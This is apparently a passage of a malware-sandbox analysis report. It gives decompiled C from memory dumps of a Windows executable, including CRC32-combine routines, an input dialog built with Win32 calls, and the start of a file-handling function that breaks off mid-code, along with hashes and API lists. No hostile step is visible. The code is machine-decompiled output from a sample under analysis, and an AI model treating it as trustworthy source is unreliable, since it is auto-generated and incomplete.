Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e936c083af54460385bf2ea051fe1ceaecbd2b1360fccd680d527d7d1d40fc92
Instruction ID: 848bb24f37e843774877416362c6b1d88ec077a2887b730543c1b80e193f658d
Opcode Fuzzy Hash: e936c083af54460385bf2ea051fe1ceaecbd2b1360fccd680d527d7d1d40fc92
Instruction Fuzzy Hash: 2F71F5716205426BD724CF1DECD0A763792FBC9711F4AC63CDA4287396C238EA62D794

Uniqueness

Uniqueness Score: -1.00%

Function 004105F0, Relevance: .1, Instructions: 143
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004105F0(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				char _v128;
				char _v256;
				signed int _t52;
				unsigned int _t53;
				unsigned int _t54;
				unsigned int _t55;
				unsigned int _t62;
				signed int* _t66;
				signed int* _t67;
				signed int _t70;
				signed int _t73;
				signed int* _t74;
				signed int* _t75;
				signed int* _t76;
				signed int* _t77;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed int _t87;
				void* _t89;
				void* _t90;
				void* _t91;
				void* _t93;
				signed int _t94;
				signed int _t95;
				void* _t96;
				signed int _t97;

				_t96 =  &_v256;
				_t94 = _a12;
				_t86 = _a16;
				_t97 = _t86;
				if(_t97 > 0 || _t97 >= 0 && _t94 != 0) {
					_t73 = 1;
					_v256 = 0xedb88320;
					_t52 = 1;
					do {
						 *(_t96 + 8 + _t52 * 4) = _t73;
						_t52 = _t52 + 1;
						_t73 = _t73 + _t73;
					} while (_t52 < 0x20);
					_t89 = 0;
					do {
						_t53 =  *(_t96 + _t89 + 0x10);
						_t74 =  &_v256;
						_t82 = 0;
						if(_t53 != 0) {
							do {
								if((_t53 & 0x00000001) != 0) {
									_t82 = _t82 ^  *_t74;
								}
								_t74 =  &(_t74[1]);
								_t53 = _t53 >> 1;
							} while (_t53 != 0);
						}
						 *(_t96 + _t89 + 0x90) = _t82;
						_t89 = _t89 + 4;
					} while (_t89 < 0x80);
					_t90 = 0;
					do {
						_t54 =  *(_t96 + _t90 + 0x90);
						_t75 =  &_v128;
						_t83 = 0;
						if(_t54 != 0) {
							do {
								if((_t54 & 0x00000001) != 0) {
									_t83 = _t83 ^  *_t75;
								}
								_t75 =  &(_t75[1]);
								_t54 = _t54 >> 1;
							} while (_t54 != 0);
						}
						 *(_t96 + _t90 + 0x10) = _t83;
						_t90 = _t90 + 4;
					} while (_t90 < 0x80);
					_t70 = _a4;
					do {
						_t91 = 0;
						do {
							_t55 =  *(_t96 + _t91 + 0x10);
							_t76 =  &_v256;
							_t84 = 0;
							if(_t55 != 0) {
								do {
									if((_t55 & 0x00000001) != 0) {
										_t84 = _t84 ^  *_t76;
									}
									_t76 =  &(_t76[1]);
									_t55 = _t55 >> 1;
								} while (_t55 != 0);
							}
							 *(_t96 + _t91 + 0x90) = _t84;
							_t91 = _t91 + 4;
						} while (_t91 < 0x80);
						if((_t94 & 0x00000001) != 0) {
							_t81 = 0;
							_t67 =  &_v128;
							if(_t70 != 0) {
								do {
									if((_t70 & 0x00000001) != 0) {
										_t81 = _t81 ^  *_t67;
									}
									_t67 =  &(_t67[1]);
									_t70 = _t70 >> 1;
								} while (_t70 != 0);
							}
							_t70 = _t81;
						}
						_t95 = (_t86 << 0x00000020 | _t94) >> 1;
						_t87 = _t86 >> 1;
						if((_t95 | _t87) != 0) {
							_t93 = 0;
							do {
								_t62 =  *(_t96 + _t93 + 0x90);
								_t77 =  &_v128;
								_t85 = 0;
								if(_t62 != 0) {
									do {
										if((_t62 & 0x00000001) != 0) {
											_t85 = _t85 ^  *_t77;
										}
										_t77 =  &(_t77[1]);
										_t62 = _t62 >> 1;
									} while (_t62 != 0);
								}
								 *(_t96 + _t93 + 0x10) = _t85;
								_t93 = _t93 + 4;
							} while (_t93 < 0x80);
							if((_t95 & 0x00000001) != 0) {
								_t80 = 0;
								_t66 =  &_v256;
								if(_t70 != 0) {
									do {
										if((_t70 & 0x00000001) != 0) {
											_t80 = _t80 ^  *_t66;
										}
										_t66 =  &(_t66[1]);
										_t70 = _t70 >> 1;
									} while (_t70 != 0);
								}
								_t70 = _t80;
							}
							goto L45;
						}
						break;
						L45:
						_t94 = (_t87 << 0x00000020 | _t95) >> 1;
						_t86 = _t87 >> 1;
					} while ((_t94 | _t86) != 0);
					return _t70 ^ _a8;
				} else {
					return _a4;
				}
			}

0x004105f0
0x004105f7
0x004105ff
0x00410606
0x00410608
0x00410620
0x00410625
0x0041062d
0x00410630
0x00410630
0x00410634
0x00410635
0x00410637
0x0041063e
0x00410640
0x00410640
0x00410644
0x00410648
0x0041064c
0x00410650
0x00410652
0x00410654
0x00410654
0x00410656
0x00410659
0x00410659
0x00410650
0x0041065d
0x00410664
0x00410667
0x0041066f
0x00410680
0x00410680
0x00410687
0x0041068e
0x00410692
0x00410694
0x00410696
0x00410698
0x00410698
0x0041069a
0x0041069d
0x0041069d
0x00410694
0x004106a1
0x004106a5
0x004106a8
0x004106b0
0x004106c0
0x004106c0
0x004106c2
0x004106c2
0x004106c6
0x004106ca
0x004106ce
0x004106d0
0x004106d2
0x004106d4
0x004106d4
0x004106d6
0x004106d9
0x004106d9
0x004106d0
0x004106dd
0x004106e4
0x004106e7
0x004106f7
0x004106f9
0x004106fb
0x00410704
0x00410706
0x00410709
0x0041070b
0x0041070b
0x0041070d
0x00410710
0x00410710
0x00410706
0x00410714
0x00410714
0x00410716
0x0041071a
0x00410720
0x00410722
0x00410730
0x00410730
0x00410737
0x0041073e
0x00410742
0x00410744
0x00410746
0x00410748
0x00410748
0x0041074a
0x0041074d
0x0041074d
0x00410744
0x00410751
0x00410755
0x00410758
0x00410768
0x0041076a
0x0041076c
0x00410772
0x00410774
0x00410777
0x00410779
0x00410779
0x0041077b
0x0041077e
0x0041077e
0x00410774
0x00410782
0x00410782
0x00000000
0x00410768
0x00000000
0x00410784
0x00410784
0x00410788
0x0041078c
0x004107a7
0x00410610
0x0041061f
0x0041061f

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
Instruction ID: 19a71de24262d1b0f8e3dc72ae5639476eb557387d8cace6485a3b0ea221bfc4
Opcode Fuzzy Hash: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
Instruction Fuzzy Hash: FD41E3326047054BE728DE28D8547EB7390EBD4304F49093FD9AA973C0C7F9E9D68689

Uniqueness

Uniqueness Score: -1.00%

Function 00410673, Relevance: .1, Instructions: 100
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00410673(signed int __edi, void* __esi, signed int __ebp, char _a16, char _a144, signed int _a276, signed int _a280) {
				unsigned int _t38;
				unsigned int _t39;
				unsigned int _t46;
				signed int* _t50;
				signed int* _t51;
				signed int _t52;
				signed int* _t55;
				signed int* _t56;
				signed int* _t57;
				signed int _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				signed int _t65;
				signed int _t66;
				void* _t68;
				void* _t69;
				void* _t71;
				signed int _t72;
				signed int _t73;
				void* _t75;

				_t72 = __ebp;
				_t68 = __esi;
				_t65 = __edi;
				do {
					_t38 =  *(_t75 + _t68 + 0x90);
					_t55 =  &_a144;
					_t62 = 0;
					if(_t38 != 0) {
						do {
							if((_t38 & 0x00000001) != 0) {
								_t62 = _t62 ^  *_t55;
							}
							_t55 =  &(_t55[1]);
							_t38 = _t38 >> 1;
						} while (_t38 != 0);
					}
					 *(_t75 + _t68 + 0x10) = _t62;
					_t68 = _t68 + 4;
				} while (_t68 < 0x80);
				_t52 = _a276;
				do {
					_t69 = 0;
					do {
						_t39 =  *(_t75 + _t69 + 0x10);
						_t56 =  &_a16;
						_t63 = 0;
						if(_t39 != 0) {
							do {
								if((_t39 & 0x00000001) != 0) {
									_t63 = _t63 ^  *_t56;
								}
								_t56 =  &(_t56[1]);
								_t39 = _t39 >> 1;
							} while (_t39 != 0);
						}
						 *(_t75 + _t69 + 0x90) = _t63;
						_t69 = _t69 + 4;
					} while (_t69 < 0x80);
					if((_t72 & 0x00000001) != 0) {
						_t61 = 0;
						_t51 =  &_a144;
						if(_t52 != 0) {
							do {
								if((_t52 & 0x00000001) != 0) {
									_t61 = _t61 ^  *_t51;
								}
								_t51 =  &(_t51[1]);
								_t52 = _t52 >> 1;
							} while (_t52 != 0);
						}
						_t52 = _t61;
					}
					_t73 = (_t65 << 0x00000020 | _t72) >> 1;
					_t66 = _t65 >> 1;
					if((_t73 | _t66) != 0) {
						_t71 = 0;
						do {
							_t46 =  *(_t75 + _t71 + 0x90);
							_t57 =  &_a144;
							_t64 = 0;
							if(_t46 != 0) {
								do {
									if((_t46 & 0x00000001) != 0) {
										_t64 = _t64 ^  *_t57;
									}
									_t57 =  &(_t57[1]);
									_t46 = _t46 >> 1;
								} while (_t46 != 0);
							}
							 *(_t75 + _t71 + 0x10) = _t64;
							_t71 = _t71 + 4;
						} while (_t71 < 0x80);
						if((_t73 & 0x00000001) != 0) {
							_t60 = 0;
							_t50 =  &_a16;
							if(_t52 != 0) {
								do {
									if((_t52 & 0x00000001) != 0) {
										_t60 = _t60 ^  *_t50;
									}
									_t50 =  &(_t50[1]);
									_t52 = _t52 >> 1;
								} while (_t52 != 0);
							}
							_t52 = _t60;
						}
						goto L32;
					}
					break;
					L32:
					_t72 = (_t66 << 0x00000020 | _t73) >> 1;
					_t65 = _t66 >> 1;
				} while ((_t72 | _t65) != 0);
				return _t52 ^ _a280;
			}

0x00410673
0x00410673
0x00410673
0x00410680
0x00410680
0x00410687
0x0041068e
0x00410692
0x00410694
0x00410696
0x00410698
0x00410698
0x0041069a
0x0041069d
0x0041069d
0x00410694
0x004106a1
0x004106a5
0x004106a8
0x004106b0
0x004106c0
0x004106c0
0x004106c2
0x004106c2
0x004106c6
0x004106ca
0x004106ce
0x004106d0
0x004106d2
0x004106d4
0x004106d4
0x004106d6
0x004106d9
0x004106d9
0x004106d0
0x004106dd
0x004106e4
0x004106e7
0x004106f7
0x004106f9
0x004106fb
0x00410704
0x00410706
0x00410709
0x0041070b
0x0041070b
0x0041070d
0x00410710
0x00410710
0x00410706
0x00410714
0x00410714
0x00410716
0x0041071a
0x00410720
0x00410722
0x00410730
0x00410730
0x00410737
0x0041073e
0x00410742
0x00410744
0x00410746
0x00410748
0x00410748
0x0041074a
0x0041074d
0x0041074d
0x00410744
0x00410751
0x00410755
0x00410758
0x00410768
0x0041076a
0x0041076c
0x00410772
0x00410774
0x00410777
0x00410779
0x00410779
0x0041077b
0x0041077e
0x0041077e
0x00410774
0x00410782
0x00410782
0x00000000
0x00410768
0x00000000
0x00410784
0x00410784
0x00410788
0x0041078c
0x004107a7

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
Instruction ID: 9888a4de930789566df02ddbbb4f2336257ff221a319327ec1b953e4cac8e425
Opcode Fuzzy Hash: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
Instruction Fuzzy Hash: 2631A6326447054BE728DD28C8947EB7390AB84304F49093FC996973D1C6F9E9D6CA85

Uniqueness

Uniqueness Score: -1.00%

Function 004106B9, Relevance: .1, Instructions: 82
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004106B9(signed int __ebx, signed int __edi, signed int __ebp, char _a16, char _a144, signed int _a280) {
				unsigned int _t30;
				unsigned int _t37;
				signed int* _t41;
				signed int* _t42;
				signed int _t43;
				signed int* _t46;
				signed int* _t47;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				signed int _t55;
				void* _t57;
				void* _t59;
				signed int _t60;
				signed int _t61;
				void* _t63;

				_t60 = __ebp;
				_t54 = __edi;
				_t43 = __ebx;
				do {
					_t57 = 0;
					do {
						_t30 =  *(_t63 + _t57 + 0x10);
						_t46 =  &_a16;
						_t52 = 0;
						if(_t30 != 0) {
							do {
								if((_t30 & 0x00000001) != 0) {
									_t52 = _t52 ^  *_t46;
								}
								_t46 =  &(_t46[1]);
								_t30 = _t30 >> 1;
							} while (_t30 != 0);
						}
						 *(_t63 + _t57 + 0x90) = _t52;
						_t57 = _t57 + 4;
					} while (_t57 < 0x80);
					if((_t60 & 0x00000001) != 0) {
						_t51 = 0;
						_t42 =  &_a144;
						if(_t43 != 0) {
							do {
								if((_t43 & 0x00000001) != 0) {
									_t51 = _t51 ^  *_t42;
								}
								_t42 =  &(_t42[1]);
								_t43 = _t43 >> 1;
							} while (_t43 != 0);
						}
						_t43 = _t51;
					}
					_t61 = (_t54 << 0x00000020 | _t60) >> 1;
					_t55 = _t54 >> 1;
					if((_t61 | _t55) != 0) {
						_t59 = 0;
						do {
							_t37 =  *(_t63 + _t59 + 0x90);
							_t47 =  &_a144;
							_t53 = 0;
							if(_t37 != 0) {
								do {
									if((_t37 & 0x00000001) != 0) {
										_t53 = _t53 ^  *_t47;
									}
									_t47 =  &(_t47[1]);
									_t37 = _t37 >> 1;
								} while (_t37 != 0);
							}
							 *(_t63 + _t59 + 0x10) = _t53;
							_t59 = _t59 + 4;
						} while (_t59 < 0x80);
						if((_t61 & 0x00000001) != 0) {
							_t50 = 0;
							_t41 =  &_a16;
							if(_t43 != 0) {
								do {
									if((_t43 & 0x00000001) != 0) {
										_t50 = _t50 ^  *_t41;
									}
									_t41 =  &(_t41[1]);
									_t43 = _t43 >> 1;
								} while (_t43 != 0);
							}
							_t43 = _t50;
						}
						goto L26;
					}
					break;
					L26:
					_t60 = (_t55 << 0x00000020 | _t61) >> 1;
					_t54 = _t55 >> 1;
				} while ((_t60 | _t54) != 0);
				return _t43 ^ _a280;
			}

0x004106b9
0x004106b9
0x004106b9
0x004106c0
0x004106c0
0x004106c2
0x004106c2
0x004106c6
0x004106ca
0x004106ce
0x004106d0
0x004106d2
0x004106d4
0x004106d4
0x004106d6
0x004106d9
0x004106d9
0x004106d0
0x004106dd
0x004106e4
0x004106e7
0x004106f7
0x004106f9
0x004106fb
0x00410704
0x00410706
0x00410709
0x0041070b
0x0041070b
0x0041070d
0x00410710
0x00410710
0x00410706
0x00410714
0x00410714
0x00410716
0x0041071a
0x00410720
0x00410722
0x00410730
0x00410730
0x00410737
0x0041073e
0x00410742
0x00410744
0x00410746
0x00410748
0x00410748
0x0041074a
0x0041074d
0x0041074d
0x00410744
0x00410751
0x00410755
0x00410758
0x00410768
0x0041076a
0x0041076c
0x00410772
0x00410774
0x00410777
0x00410779
0x00410779
0x0041077b
0x0041077e
0x0041077e
0x00410774
0x00410782
0x00410782
0x00000000
0x00410768
0x00000000
0x00410784
0x00410784
0x00410788
0x0041078c
0x004107a7

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
Instruction ID: 913bc378ac3619563ee01a4a6d213c0ab1a3543cf495c4be7d0f57f0f97c2174
Opcode Fuzzy Hash: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
Instruction Fuzzy Hash: 2C219532644B054BE7289D68D8953EB7390AB84304F49093FC9A6973D1CAF9F9D6CA84

Uniqueness

Uniqueness Score: -1.00%

Function 00408F09, Relevance: 65.0, APIs: 32, Strings: 5, Instructions: 270
windowregistrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00408F09(void* __ecx, void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, signed char _a16, intOrPtr _a20) {
				struct _WNDCLASSEXW _v48;
				struct tagMSG _v76;
				short _v78;
				short _v80;
				char _v82;
				struct tagACCEL _v88;
				WCHAR* _v92;
				void* _v96;
				wchar_t* _v104;
				struct HINSTANCE__* _t48;
				WCHAR* _t51;
				struct HWND__* _t56;
				struct HWND__* _t57;
				int _t58;
				int _t62;
				struct HWND__* _t74;
				struct HWND__* _t76;
				struct HWND__* _t80;
				short _t82;
				short _t84;
				int _t105;
				WCHAR* _t110;
				struct HWND__* _t111;
				void* _t112;
				void* _t116;
				wchar_t* _t117;
				struct HACCEL__* _t122;
				int _t130;

				_t116 = __edx;
				_t112 = __ecx;
				_v96 = 0;
				_t110 = E00408DF8(_a4);
				_v92 = _t110;
				_a4 = E00408DF8(_a8);
				_t117 = E00408DF8(_a12);
				_t130 =  *0x4170c4; // 0x0
				if(_t130 == 0) {
					 *0x4170c4 = GetStockObject(0x11);
				}
				_t48 =  *0x41700c; // 0x400000
				_v48.cbSize = 0x30;
				_v48.style = 3;
				_v48.lpfnWndProc = E00408E54;
				_v48.cbClsExtra = 0;
				_v48.cbWndExtra = 0;
				_v48.hInstance = _t48;
				_v48.hIcon = LoadIconW(_t48, 1);
				_v48.hCursor = LoadCursorW(0, 0x7f00);
				_t51 =  *0x416114; // 0x412044
				_v48.lpszClassName = _t51;
				_v48.hbrBackground = 0x10;
				_v48.lpszMenuName = 0;
				_v48.hIconSm = 0;
				RegisterClassExW( &_v48);
				 *0x4170c8 = 0;
				 *0x4170d8 = E00409471(_t112);
				E00409528(1);
				_t56 =  *0x4170d8; // 0x0
				if(_t56 == 0 || IsWindowEnabled(_t56) == 0) {
					 *0x4170dc = 0;
				} else {
					EnableWindow( *0x4170d8, 0);
					 *0x4170dc = 1;
				}
				_t57 = E00409471(_t112);
				_t58 = GetSystemMetrics(1);
				asm("cdq");
				_t62 = GetSystemMetrics(0);
				asm("cdq");
				_t111 = CreateWindowExW(0,  *0x416114, _t110, 0x10c80000, (_t62 - _t116 >> 1) - 0x96, (_t58 - _t116 >> 1) - 0x41, 0x12c, 0x82, _t57, 0,  *0x41700c, 0);
				if(_t111 == 0) {
					L20:
					if(_v96 != 0) {
						goto L22;
					}
					goto L21;
				} else {
					SetWindowLongW(_t111, 0xffffffeb,  &_v96);
					_t74 = CreateWindowExW(0, L"STATIC", _a4, 0x5000000b, 0xa, 0xa, 0x118, 0x16, _t111, 0,  *0x41700c, 0);
					 *0x4170d4 = _t74;
					SendMessageW(_t74, 0x30,  *0x4170c4, 1);
					if((_a16 & 0x00000001) != 0) {
						_push(0x20);
						_pop(0);
					}
					_t76 = CreateWindowExW(0x200, L"EDIT", 0, 0x50010080, 0xa, 0x20, 0x113, 0x15, _t111, 0xa,  *0x41700c, 0);
					 *0x4170d0 = _t76;
					SendMessageW(_t76, 0x30,  *0x4170c4, 1);
					SetFocus( *0x4170d0);
					if(_t117 != 0) {
						SendMessageW( *0x4170d0, 0xc, 0, _t117);
						_push(wcslen(_t117));
						_t105 = wcslen(_t117);
						_pop(_t112);
						SendMessageW( *0x4170d0, 0xb1, _t105, ??);
					}
					_t80 = CreateWindowExW(0, L"BUTTON", L"OK", 0x50010001, 0x6e, 0x43, 0x50, 0x19, _t111, 0x3e8,  *0x41700c, 0);
					 *0x4170cc = _t80;
					SendMessageW(_t80, 0x30,  *0x4170c4, 1);
					_t82 = 0xd;
					_v88.key = _t82;
					_v88.cmd = 0x3e8;
					_t84 = 0x1b;
					_v80 = _t84;
					_v78 = 0x3e9;
					_v88.fVirt = 1;
					_v82 = 1;
					_t122 = CreateAcceleratorTableW( &_v88, 2);
					SetForegroundWindow(_t111);
					BringWindowToTop(_t111);
					while( *0x4170c8 == 0) {
						if(GetMessageW( &_v76, 0, 0, 0) == 0) {
							break;
						}
						if(TranslateAcceleratorW(_t111, _t122,  &_v76) == 0) {
							TranslateMessage( &_v76);
							DispatchMessageW( &_v76);
						}
					}
					if(_t122 != 0) {
						DestroyAcceleratorTable(_t122);
					}
					if(_v96 == 0) {
						L21:
						E0040E2A0(_t112, _a20);
						L22:
						E00408E3A(_v92);
						E00408E3A(_a4);
						return E00408E3A(_t117);
					} else {
						wcscpy(E0040E200(wcslen(_v96), _a20), _v104);
						_pop(_t112);
						HeapFree( *0x417008, 0, _v104);
						goto L20;
					}
				}
			}

0x00408f09
0x00408f09
0x00408f16
0x00408f25
0x00408f27
0x00408f37
0x00408f46
0x00408f48
0x00408f4e
0x00408f58
0x00408f58
0x00408f5d
0x00408f65
0x00408f6d
0x00408f75
0x00408f7d
0x00408f81
0x00408f85
0x00408f95
0x00408f9f
0x00408fa3
0x00408fa8
0x00408fb1
0x00408fb9
0x00408fbd
0x00408fc1
0x00408fc7
0x00408fd4
0x00408fd9
0x00408fde
0x00408fe5
0x0040900b
0x00408ff2
0x00408ff9
0x00408fff
0x00408fff
0x00409019
0x00409031
0x00409033
0x0040903e
0x00409046
0x00409061
0x00409065
0x0040925a
0x0040925f
0x00000000
0x00000000
0x00000000
0x0040906b
0x00409073
0x004090a1
0x004090b1
0x004090b9
0x004090c3
0x004090c5
0x004090c7
0x004090c7
0x004090f7
0x00409101
0x00409109
0x00409111
0x00409119
0x00409126
0x0040912f
0x00409131
0x00409136
0x00409143
0x00409143
0x0040916d
0x00409177
0x0040917f
0x00409183
0x00409184
0x00409190
0x00409195
0x00409196
0x004091a0
0x004091ac
0x004091b1
0x004091bd
0x004091bf
0x004091c6
0x0040920a
0x004091e1
0x00000000
0x00000000
0x004091f2
0x004091f9
0x00409204
0x00409204
0x004091f2
0x00409215
0x00409218
0x00409218
0x00409223
0x00409261
0x00409268
0x0040926d
0x00409271
0x0040927a
0x0040928f
0x00409225
0x00409241
0x00409247
0x00409254
0x00000000
0x00409254
0x00409223

APIs

Part of subcall function 00408DF8: wcslen.MSVCRT ref: 00408E04
Part of subcall function 00408DF8: HeapAlloc.KERNEL32(00000000,00000000,?,00408F21,?), ref: 00408E1A
Part of subcall function 00408DF8: wcscpy.MSVCRT ref: 00408E2B

GetStockObject.GDI32(00000011), ref: 00408F52
LoadIconW.USER32 ref: 00408F89
LoadCursorW.USER32(00000000,00007F00), ref: 00408F99
RegisterClassExW.USER32 ref: 00408FC1
IsWindowEnabled.USER32(00000000), ref: 00408FE8
EnableWindow.USER32(00000000), ref: 00408FF9
GetSystemMetrics.USER32 ref: 00409031
GetSystemMetrics.USER32 ref: 0040903E
CreateWindowExW.USER32 ref: 0040905F
SetWindowLongW.USER32 ref: 00409073
CreateWindowExW.USER32 ref: 004090A1
SendMessageW.USER32(00000000,00000030,00000001), ref: 004090B9
CreateWindowExW.USER32 ref: 004090F7
SendMessageW.USER32(00000000,00000030,00000001), ref: 00409109
SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409111
SendMessageW.USER32(0000000C,00000000,00000000), ref: 00409126
wcslen.MSVCRT ref: 00409129
wcslen.MSVCRT ref: 00409131
SendMessageW.USER32(000000B1,00000000,00000000), ref: 00409143
CreateWindowExW.USER32 ref: 0040916D
SendMessageW.USER32(00000000,00000030,00000001), ref: 0040917F
CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004091B6
SetForegroundWindow.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004091BF
BringWindowToTop.USER32(00000000), ref: 004091C6
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004091D9
TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 004091EA
TranslateMessage.USER32(?), ref: 004091F9
DispatchMessageW.USER32 ref: 00409204
DestroyAcceleratorTable.USER32 ref: 00409218
wcslen.MSVCRT ref: 00409229
wcscpy.MSVCRT ref: 00409241
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409254

Strings

BUTTON, xrefs: 00409166
0, xrefs: 00408F65
STATIC, xrefs: 0040909B
EDIT, xrefs: 004090ED
D A, xrefs: 00408FA3

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Message$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconLongObjectRegisterStock
String ID: 0$BUTTON$D A$EDIT$STATIC
API String ID: 54849019-3594934238
Opcode ID: 52e87966c6cca03b54c2017619d01c3975366cb43439a8209a5400c07438eea5
Instruction ID: 4016936b5c3c7f784b3cc7a4ee05ecee8f5df5742f345e72c0c18d3b3e823eb4
Opcode Fuzzy Hash: 52e87966c6cca03b54c2017619d01c3975366cb43439a8209a5400c07438eea5
Instruction Fuzzy Hash: 1E917F70648300BFE7219F61DC4AF9B7FA9FB48B44F01893EF644A61E1C7B998408B59

Uniqueness

Uniqueness Score: -1.00%

Function 00401500, Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 335
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401500(void* __edi, void* __esi, char _a4, long _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v0;
				char _v4;
				char _v8;
				char* _v12;
				char _v16;
				char _v20;
				intOrPtr _v28;
				char _v36;
				signed int _v48;
				void* __ebx;
				void* _t65;
				void* _t66;
				void* _t82;
				void* _t88;
				void* _t94;
				void* _t99;
				void* _t100;
				void* _t108;
				void* _t111;
				void* _t120;
				long _t129;
				void* _t130;
				void* _t131;
				void* _t136;
				char* _t142;
				void* _t151;
				void* _t152;
				void* _t157;
				void* _t159;
				void* _t163;
				intOrPtr _t178;
				intOrPtr _t183;
				void* _t186;
				char* _t189;
				void* _t190;
				void* _t191;
				void* _t193;
				void* _t196;
				void* _t199;
				intOrPtr _t200;
				void* _t201;
				intOrPtr _t202;
				intOrPtr _t203;
				intOrPtr _t205;
				void* _t206;
				intOrPtr _t207;
				void* _t208;
				intOrPtr _t210;
				void* _t211;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t218;
				void* _t221;
				void* _t223;
				void* _t224;
				intOrPtr _t227;
				void* _t231;

				_t224 = __esi;
				_t223 = __edi;
				_t189 = 0xb;
				do {
					_t231 = _t231 - 4;
					_v12 = 0;
					_t189 = _t189 - 1;
				} while (_t189 != 0);
				E0040DF60();
				_t169 =  *0x41708c; // 0x1
				if(_t169 != 1) {
					 *0x41708c = 1;
					_a16 = 1;
					while(1) {
						_t65 = E0040DE20();
						_t190 = _t189;
						_push(_t65);
						_t66 = E0040DE20();
						_t191 = _t190;
						E004057F0(_t169, _t223, _t224,  *0x41701c, _a16, 0x41602a, _t66);
						_push( &_v12);
						E0040DE60();
						_v12 = E00405920(_v20, 0x41602e);
						__eflags = _v12;
						if(_v12 != 0) {
							_t130 = E0040DE20();
							_t213 = _t191;
							_push(_t130);
							_t131 = E0040DE20();
							_t214 = _t213;
							E004057F0(_t169, _t223, _t224, _a4, 2, 0x41602e, _t131);
							_push( &_a8);
							E0040DE60();
							_t136 = E0040DE20();
							_t215 = _t214;
							_push(_t136);
							E004057F0(_t169, _t223, _t224, _v20, 1, 0x41602e, E0040DE20());
							E0040DE60( &_v36, _t215);
						}
						__eflags = 0;
						E00405120(0, _a4);
						if(__eflags != 0) {
							break;
						}
						asm("cdq");
						_t189 = _a16 % 2;
						__eflags = _t189;
						if(__eflags != 0) {
							_t82 = E0040DE20();
							_t193 = _t189;
							_push(_t82);
							_push(_t193);
							_push(E0040DE20());
							E00405AC0(__eflags, _a4, 1);
							E0040E020(2);
							_pop(_t186);
							E00405120(E00405160(_t186), 0x416032);
							if(__eflags == 0) {
								_t88 = E0040DE20();
								_t196 = 0x416032;
								_push(_t88);
								E00405D40(_v0, 0x416032, E0040DE20());
								E0040DE60( &_v12, _t196);
								_push(_v20);
								_t94 = E0040DE20();
								_pop(_t199);
								E0040DFC0(_t199);
								_t52 =  &_a4; // 0x240d03c
								E0040DE60(_t52, _t94);
								_push(E00405980(_v12));
								_t227 =  *0x417090; // 0x240d038
								__eflags = _t227 + _v48 * 0xc;
								_pop(_t99);
								_v0 = _t99;
								_t200 =  *0x417088; // 0x279a268
								_t100 = E0040DE20();
								_t201 = _t200;
								E0040DFC0(_t201);
								_t202 =  *0x417048; // 0x2799440
								E0040DFC0(_t202);
